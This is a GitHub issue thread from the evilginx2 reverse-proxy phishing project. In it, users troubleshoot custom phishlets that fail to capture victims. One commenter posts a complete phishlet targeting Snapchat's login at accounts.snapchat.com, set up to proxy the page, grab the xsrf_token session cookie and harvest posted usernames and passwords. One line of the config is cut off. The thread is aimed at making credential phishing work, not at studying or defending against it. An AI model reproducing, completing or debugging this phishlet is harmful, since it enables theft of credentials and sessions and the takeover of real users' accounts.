### ISSUE TITLE
Landing page 

### ISSUE THREAD

**Issue by jelledesnelle** [kgretzky/evilginx2#238]
Hello,

I modified my custom phishlets, when starting evilginx2 no errors its all good.
But i have one quiestion: when loading phishing url it redirect directly to original domain. So evilginx2 tracked nothing, just directly redirecting me to the original page?

Any suggestions how to fix?

Kind regards,

**Comment by maisonmargiela0** [comment]
Post the entire phishlet in order to see the error.

**Comment by mac4533** [comment]
author: '@mac'
min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'snapchat.com', session: true, is_landing: true}
sub_filters:
  - {triggers_on: 'accounts.snapchat.com', orig_sub: 'accounts', domain: 'snapchat.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'ap$
auth_tokens:
  - domain: '.snapchat.com'
    keys: ['xsrf_token']
credentials:
  username:
    key: 'username'
    search: '(.*)'
    type: 'post'
  password:
    key: 'password'
    search: '(.*)'
    type: 'post'
login:
  domain: 'accounts.snapchat.com'
  path: '/accounts/login'

@maisonmargiela0  my phishlet wont log in
